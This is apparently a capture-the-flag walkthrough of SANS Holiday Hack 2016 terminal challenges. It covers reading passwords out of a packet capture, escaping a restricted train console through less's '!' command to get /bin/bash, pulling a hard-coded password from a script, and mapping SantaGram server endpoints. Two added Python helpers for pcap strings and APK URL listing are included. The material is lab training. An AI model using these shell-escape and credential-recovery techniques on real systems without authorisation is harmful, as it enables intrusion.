Excellent. There is evidently an entry in /etc/sudoers that lets us run commands as itchy without a password (sudo -l would list the exact rule), and running tcpdump over the capture works, so the file is readable as itchy.

Now let's see about that password. tcpdump gives us a lot of output, and I'm probably looking for a clear text password, so let's just try strings.

$ sudo -u itchy strings out.pcap
sudo: unable to resolve host f104dddd0fc6
ZAX<
ZAX}
ZAX,
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX2
4hf@
Ehg@
OHTTP/1.0 200 OK
ZAX
ZAX#
[hh@
OServer: SimpleHTTP/0.6 Python/2.7.12+
ZAXr
rhi@
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
Ihj@
PContent-Length: 113
ZAX 
ZAX2
ZAXI
dhk@
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
P<html>
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>
4hm@
ZAXW
@2/@
DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX 
THTTP/1.0 200 OK
TServer: SimpleHTTP/0.6 Python/2.7.12+
ZAX"
,#"=X
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
ZAXr
,#o=X
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
4-1@

This gives us part one, “santasli”, and as any good Simpsons fan will tell you, the full password is going to be santaslittlehelper. But how can we read that .bin file that contains the second half?

Let's try strings again, this time with -e l, which looks for 16-bit little-endian (UTF-16LE) strings rather than plain ASCII. strings only reports runs of consecutive printable bytes, and in UTF-16 every character is followed by a zero byte, so text like p\0a\0r\0t\0 is invisible to the default scan.

$ sudo -u itchy strings -e l out.pcap
sudo: unable to resolve host f104dddd0fc6
part2:ttlehelper

That confirms it. The password to the door is santaslittlehelper
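The second half was missed by plain strings because the file is UTF-16LE: every character is followed by a zero byte, so the longest run of printable ASCII is a single byte. The script below, an added example that is not from the original write-up, does both passes in one go: it parses a classic libpcap file, concatenates each TCP direction's payload, and extracts printable runs as both ASCII and UTF-16LE. SAMPLE_PCAP is constructed in memory to mimic the two HTTP exchanges seen in out.pcap (same hosts and paths, made-up sequence numbers, zero checksums); real captures should go through tshark or scapy for proper TCP reassembly, which this deliberately skips.

```python
import re
import socket
import struct
import sys
from typing import Dict, List, Optional, Tuple

MIN_LEN = 4  # same default minimum length as strings(1)
ASCII_RE = re.compile(rb'[\x20-\x7e]{%d,}' % MIN_LEN)
UTF16LE_RE = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % MIN_LEN)   # what strings -e l finds

FlowKey = Tuple[str, int, str, int]


def iter_frames(pcap: bytes):
    """Yield raw Ethernet frames from a classic libpcap (.pcap) file."""
    magic = pcap[:4]
    if magic == b'\xd4\xc3\xb2\xa1':
        end = '<'
    elif magic == b'\xa1\xb2\xc3\xd4':
        end = '>'
    else:
        raise ValueError('not a libpcap capture (pcapng needs a different reader)')
    if struct.unpack(end + 'I', pcap[20:24])[0] != 1:
        raise ValueError('only LINKTYPE_ETHERNET is handled here')
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl, _orig = struct.unpack(end + 'IIII', pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl]
        off += incl


def tcp_payload(frame: bytes) -> Optional[Tuple[FlowKey, bytes]]:
    """Return ((src, sport, dst, dport), payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 54 or frame[12:14] != b'\x08\x00' or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    ip_len = struct.unpack('!H', frame[16:18])[0]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    t = 14 + ihl
    sport, dport = struct.unpack('!HH', frame[t:t + 4])
    doff = (frame[t + 12] >> 4) * 4
    return (src, sport, dst, dport), frame[t + doff:14 + ip_len]   # trims any Ethernet trailer


def strings_from_pcap(pcap: bytes) -> Dict[str, List[str]]:
    """Concatenate each direction's TCP payload in capture order (no sequence-number
    reassembly, so retransmissions or reordering would corrupt a stream) and pull
    printable runs out as ASCII and as UTF-16LE."""
    flows: Dict[FlowKey, bytearray] = {}
    for frame in iter_frames(pcap):
        hit = tcp_payload(frame)
        if hit and hit[1]:
            flows.setdefault(hit[0], bytearray()).extend(hit[1])
    found: Dict[str, List[str]] = {'ascii': [], 'utf16le': []}
    for buf in flows.values():
        data = bytes(buf)
        found['ascii'] += [m.group().decode('ascii') for m in ASCII_RE.finditer(data)]
        found['utf16le'] += [m.group().decode('utf-16-le') for m in UTF16LE_RE.finditer(data)]
    return found


# --- constructed sample capture ------------------------------------------------
def _frame(src: str, sport: int, dst: str, dport: int, payload: bytes) -> bytes:
    tcp = struct.pack('!HHIIBBHHH', sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000,
                     64, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return b'\0' * 12 + b'\x08\x00' + ip + tcp + payload


def _pcap(frames: List[bytes]) -> bytes:
    out = struct.pack('<IHHiIII', 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack('<IIII', 1480678080 + i, 0, len(f), len(f)) + f
    return out


CLIENT, SERVER = '192.168.188.1', '192.168.188.130'
SAMPLE_PCAP = _pcap([
    _frame(CLIENT, 52102, SERVER, 80, b'GET /firsthalf.html HTTP/1.1\r\nHost: 192.168.188.130\r\n\r\n'),
    _frame(SERVER, 80, CLIENT, 52102, b'HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n'
           b'<input type="hidden" name="part1" value="santasli" />'),
    _frame(CLIENT, 52103, SERVER, 80, b'GET /secondhalf.bin HTTP/1.1\r\nHost: 192.168.188.130\r\n\r\n'),
    _frame(SERVER, 80, CLIENT, 52103, b'HTTP/1.0 200 OK\r\nContent-type: application/octet-stream\r\n\r\n'
           + b'\x00\x13\x37' + 'part2:ttlehelper'.encode('utf-16-le') + b'\x00\x00\xff'),
])

if __name__ == '__main__':
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for kind, items in strings_from_pcap(data).items():
        for s in items:
            print(f'[{kind}] {s}')
```

With a real file (python3 pcapstrings.py out.pcap) the UTF-16LE list is where part2 shows up; the ASCII list holds the HTTP headers and the part1 form field. Extending the UTF-16 regex to big-endian (\x00 before the byte) covers the other case strings -e b handles.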

When you first open the terminal you are presented with the following.

Find the passphrase deep in the directories. OK, a recursive ls seems like a good shout here.

$ ls -ahtlR
.:
total 32K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 .
drwxr-xr-x 22 root root 4.0K Dec  6 19:40 ..
-rw-r--r--  1 elf  elf  3.9K Dec  6 19:40 .bashrc
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .doormat
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp
-rw-r--r--  1 elf  elf   220 Nov 12  2014 .bash_logout
-rw-r--r--  1 elf  elf   675 Nov 12  2014 .profile
./.doormat:
total 20K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 . 
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 share
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp
./.doormat/. :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40  
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 bin
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 not_here

./.doormat/. / :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 \
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 opt
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var

./.doormat/. / /\:
total 20K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 \\
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 santa
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 ls

./.doormat/. / /\/\\:
total 20K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 Don't Look Here!
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 holiday
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!:
total 20K
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 You are persistent, aren't you?
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 secret
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 files

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?:
total 20K
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 '
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 cookbook
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/':
total 12K
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
-rw-r--r-- 1 root root   17 Dec  6 19:39 key_for_the_door.txt

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook:
total 8.0K
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp:
total 8.0K
drwxr-xr-x 6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/secret:
total 8.0K
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/files:
total 8.0K
drwxr-xr-x 8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/holiday:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/temp:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/santa:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/ls:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /opt:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /var:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /bin:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /not_here:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/share:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/temp:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./var:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./temp:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .
$

key_for_the_door.txt looks like a winner. But how to read it? I don't really feel like trying to escape all those directory names (spaces, backslashes, quotes and a directory literally named ' are all in the path). Fortunately I don't need to. As we saw earlier, find has a nice -exec feature and will let me target a single file by name, handing the real path straight to cat without the shell ever having to parse it.

$ find -name key_for_the_door.txt -exec cat {} +
key: open_sesame

This command is as simple as it looks: find a file named key_for_the_door.txt and then run cat against it, which outputs the contents of the file.

Password for the door is open_sesame

When you first open the terminal you are presented with the following.

Fans of the film WarGames should immediately recognise this, and it doesn't take long to realise we are playing the role of David. To complete this challenge just play out the scene, making sure you get all the case and punctuation correct.

GREETINGS PROFESSOR FALKEN.

Hello.


HOW ARE YOU FEELING TODAY?

I'm fine. How are you?


EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?


People sometimes make mistakes.


YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?

WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.

FINE



,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 

2

AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 
LOOK AT THE PRETTY LIGHTS
Press Enter To Continue

Password to the secret bookcase: LOOK AT THE PRETTY LIGHTS

When you first open the terminal you are presented with the following

A quick ls shows us an executable file named wumpus, and running it drops us into an old-school text game, Hunt the Wumpus.

$ ./wumpus
Instructions? (y-n) y
Sorry, but the instruction file seems to have disappeared in a
puff of greasy black smoke! (poof)
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 5 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 16 of the cave, and have 5 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 13, 15, and 19.
Move or shoot? (m-s)

No instructions, sad times. What about checking for command line help?

$ ./wumpus --help
./wumpus: invalid option -- '-'
usage: wump [parameters]
$

OK, no help, but it looks like it accepts command line parameters. Let's have a play.

$ ./wumpus -a
./wumpus: option requires an argument -- 'a'
usage: wump [parameters]
$ ./wumpus -a a
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 0 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 3 of the cave, and have 0 arrows left.
*rustle* *rustle* (must be bats nearby)
There are tunnels to rooms 6, 15, and 20.
Move or shoot? (m-s)

OK, so running with -a a opens the game, but now I have 0 arrows where I had 5 before. The argument is presumably converted with atoi(), which turns a non-numeric value into 0, and the game does not validate it.

$ ./wumpus -a 100000
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 100000 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 8 of the cave, and have 100000 arrows left.
*rustle* *rustle* (must be bats nearby)
*whoosh* (I feel a draft from some pits).
There are tunnels to rooms 12, 17, and 19.
Move or shoot? (m-s)

Excellent, 100,000 custom super anti-evil Wumpus arrows. Let's see what else we can set.

  • -a i = number of arrows
  • -b i = number of bats
  • -p i = number of pits
  • -r i = number of rooms (although Wumpus refuses to play with fewer than 6 rooms)
$ ./wumpus -b 0 -p 0 -a 100 -r 6
Instructions? (y-n) n
You're in a cave with 6 rooms and 3 tunnels leading from each room.
There are 0 bats and 0 pits scattered throughout the cave, and your
quiver holds 100 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) #

The Wumpus is in one of the adjoining rooms, so I'm just going to fire an arrow into each one until it dies. With no bats or pits there is nothing else in the cave to stop me.

You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) s 1
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD
Care to play another game? (y-n)

And we have the password to the next room: WUMPUS IS MISUNDERSTOOD

When you first open the terminal you are presented with the following

Great, let's start the train.

                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console
menu:main> START
Checking brakes....
Brake must be off to start the train.
                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console

menu:main> BRAKEOFF

*******CAUTION*******
The brake has been released!
*******CAUTION*******
off

                ==== MAIN MENU ====

STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console

menu:main> START

Checking brakes....
Enter Password:

It needs a password. Let's see if HELP gives us anything.

**STATUS** option will show you the current state of the train (brakes, boiler, boiler
 temp, coal level)
**BRAKEON** option enables the brakes.  Brakes should be enabled at every stop and whi
le the train is not in use.
  
**BRAKEOFF** option disables the brakes.  Brakes must be disabled before the **START**
 command will execute.
**START** option will start the train if the brake is released and the user has the co
rrect password.
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS
 you know something I don't.
Just in case you wanted to know, here's a really good Cranberry pie recipe:
Ingredients
1 recipe pastry for a 9 inch double crust pie
1 1/2 cups white sugar
1/3 cup all-purpose flour
1/4 teaspoon salt
1/2 cup water 
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
:

It looks like the help is being displayed in less; we can confirm this by pressing the ‘h’ key and getting the less help screen.

                  SUMMARY OF LESS COMMANDS
     Commands marked with * may be preceded by a number, N.
     Notes in parentheses indicate the behavior if N is given.
     A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K.
 h  H                 Display this help.
 q  :q  Q  :Q  ZZ     Exit.
---------------------------------------------------------------------------

If we read through the help file something really interesting jumps out.

---------------------------------------------------------------------------
                    MISCELLANEOUS COMMANDS
  -<flag>              Toggle a command line option [see OPTIONS below].
  --<name>             Toggle a command line option, by name.
  _<flag>              Display the setting of a command line option.
  __<name>             Display the setting of an option, by name.
  +cmd                 Execute the less cmd each time a new file is examined.
  !command             Execute the shell command with $SHELL.

We can run shell commands with the ! prefix. This is the classic pager escape: any restricted menu that shells out to less (or more, vi, man and similar tools) without disabling their command features hands the user a full shell. less has a secure mode, enabled by setting LESSSECURE=1 in the environment, that disables the ! shell command, the | pipe command and file editing; that is what this console should have run its help through.

Let's try opening an interactive shell with ! /bin/bash

! /bin/bash
$ ls -ahtl
total 40K
drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 .
drwxr-xr-x 6 root      root      4.0K Dec 10 19:39 ..
-rwxr-xr-x 1 root      root       11K Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root      root      1.5K Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root      root      1.6K Dec 10 19:36 Train_Console
-rw-r--r-- 1 conductor conductor  220 Nov 12  2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3.5K Nov 12  2014 .bashrc
-rw-r--r-- 1 conductor conductor  675 Nov 12  2014 .profile
$

Nice, ActivateTrain is owned by root but has the executable bit set for everyone. I wonder if it's as simple as running it.

! ./ActivateTrain
 MONTH   DAY     YEAR          HOUR   MIN
  +-----+ +----+ +------+  O AM +----+ +----+      DISCONNECT CAPACITOR DRIVE
  | NOV | | 16 | | 1978 |       | 10 |:| 21 |           BEFORE OPENING
  +-----+ +----+ +------+  X PM +----+ +----+     +------------------------+
                DESTINATION TIME                  |                        |
  +-----------------------------------------+     |    +XX         XX+     |
  +-----------------------------------------+     |    |XXX       XXX|     |
                                                  |  +-+ XXX     XXX +-+   |
   MONTH   DAY     YEAR          HOUR   MIN       |       XXX   XXX        |
  +-----+ +----+ +------+  X AM +----+ +----+     |         XXXXX          |
  | DEC | | 19 | | 2016 |       | 08 |:| 45 |     |          XXX           |
  +-----+ +----+ +------+  O PM +----+ +----+     |          XXX           |
                  PRESENT TIME                    |          XXX           |
  +-----------------------------------------+     | SHIELD EYES FROM LIGHT |
  +-----------------------------------------+     |          XXX           |
                                                  |          XX+-+         |
   MONTH   DAY     YEAR          HOUR   MIN       |                        |
  +-----+ +----+ +------+  O AM +----+ +----+     +------------------------+
  | NOV | | 16 | | 1978 |       | 10 |:| 21 |            +---------+
  +-----+ +----+ +------+  X PM +----+ +----+            |ACTIVATE!|
                LAST TIME DEPARTED                       +---------+
Press Enter to initiate time travel sequence.

Seems like this is the Back To The Future train, and it has just sent us back to 1978.

And if you travel up to the top of the North Pole, through the Wumpus door and into the DFER room, you will find where Santa Claus is being held.

We found Santa :) But he doesn’t know who kidnapped him.

I had managed to bypass the train application, but I still wanted to know what the password was. So back to the console.

Train_Console turns out to be a shell script rather than a compiled binary (note the #!/bin/bash line), so strings, or plain cat, shows its source, and the password is hard-coded in clear text in the PASS variable.

$ strings Train_Console
#!/bin/bash
HOMEDIR="/home/conductor"
CTRL="$HOMEDIR/"
DOC="$HOMEDIR/TrainHelper.txt"
PAGER="less"
BRAKE="on"
PASS="24fb3e89ce2aa0ea422c3d511d40dd84"
print_header() {
        echo ""
        echo "Train Management Console: AUTHORIZED USERS ONLY"

Running the console again and using the password we found works as well.

We found Santa :) but our task is not yet complete. We need to know Who took Santa and Why.

Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?”

Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”

Reading the full intro to question 7, it suggests that the APK file will hold some clues, and that any IPs we find must be confirmed in scope by asking Tom Hessman in game before starting any testing.

There are 6 items for us to retrieve audio files from.

  • The Mobile Analytics Server (Via credentialed login access)
  • The Dungeon Game
  • The Debug Server
  • The Banner Ad Server
  • The Uncaught Exception Handler Server
  • The Mobile Analytics Server (Post Authentication)

First lets find all the targets. We know the APK holds clues and we already decompiled the source so lets have a look there.

$ grep -r analytics SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_launch_url" id="0x7f070015" />
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_usage_url" id="0x7f070016" />

Grepping for dungeon returns a similar result: another domain listed in the res/values/strings.xml file. So let's take a closer look at that file.

<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
    <string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="status_bar_notification_info_overflow">999+</string>
    <string name="TAG">SantaGram</string>
    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
    <string name="appVersion">4.2</string>
    <string name="app_name">SantaGram</string>
    <string name="appbar_scrolling_view_behavior">android.support.design.widget.AppBarLayout$ScrollingViewBehavior</string>
    <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
    <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
    <string name="character_counter_pattern">%1$d / %2$d</string>
    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">true</string>
    <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
    <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
    <string name="title_activity_comments">Comments</string>
</resources>
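Grepping strings.xml for each service one at a time works, but the file is small and structured, so it is worth pulling every URL out in one pass and noting which are plain http. Below is an added example, not code from the original write-up or from SantaGram, that parses the decoded strings.xml, lists the distinct hostnames to hand to Tom Hessman for the scope check, and flags cleartext endpoints and boolean resource strings such as debug_data_enabled. SAMPLE_STRINGS_XML is a trimmed copy of the file above with the support-library strings removed.

```python
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List, NamedTuple, Union
from urllib.parse import urlparse


class Endpoint(NamedTuple):
    name: str        # the android:name of the <string> resource
    url: str
    host: str
    cleartext: bool  # plain http: credentials and telemetry cross the wire unencrypted


def _root(xml_text: Union[str, bytes]) -> ET.Element:
    # Feed bytes so the encoding declaration in the prolog is honoured.
    data = xml_text.encode('utf-8') if isinstance(xml_text, str) else xml_text
    return ET.fromstring(data)


def endpoints_from_strings_xml(xml_text: Union[str, bytes]) -> List[Endpoint]:
    """Every <string> whose value is an http(s) URL, in file order."""
    out = []
    for s in _root(xml_text).iter('string'):
        value = (s.text or '').strip()
        if not value.lower().startswith(('http://', 'https://')):
            continue
        u = urlparse(value)
        out.append(Endpoint(s.get('name', ''), value, u.hostname or '', u.scheme == 'http'))
    return out


def hosts(endpoints: List[Endpoint]) -> List[str]:
    """Distinct hostnames: this is the list to resolve and get confirmed in scope."""
    return sorted({e.host for e in endpoints if e.host})


def boolean_flags(xml_text: Union[str, bytes]) -> Dict[str, str]:
    """String resources holding true/false; debug toggles shipped to production live here."""
    return {s.get('name', ''): (s.text or '').strip()
            for s in _root(xml_text).iter('string')
            if (s.text or '').strip().lower() in ('true', 'false')}


# Trimmed copy of SantaGram_4.2/res/values/strings.xml as decoded above.
SAMPLE_STRINGS_XML = '''<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="TAG">SantaGram</string>
    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
    <string name="appVersion">4.2</string>
    <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">true</string>
    <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
    <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
</resources>
'''

if __name__ == '__main__':
    xml_text = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_STRINGS_XML
    eps = endpoints_from_strings_xml(xml_text)
    print('hosts to confirm in scope:')
    for h in hosts(eps):
        print('  ' + h)
    for e in eps:
        print(f'{"CLEARTEXT " if e.cleartext else "          "}{e.name}: {e.url}')
    for name, val in boolean_flags(xml_text).items():
        print(f'flag {name} = {val}')
```

Run it against SantaGram_4.2/res/values/strings.xml. Four of the five services are reached over plain http, and debug_data_enabled is true in a shipped build; both are findings in their own right before any server is touched.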

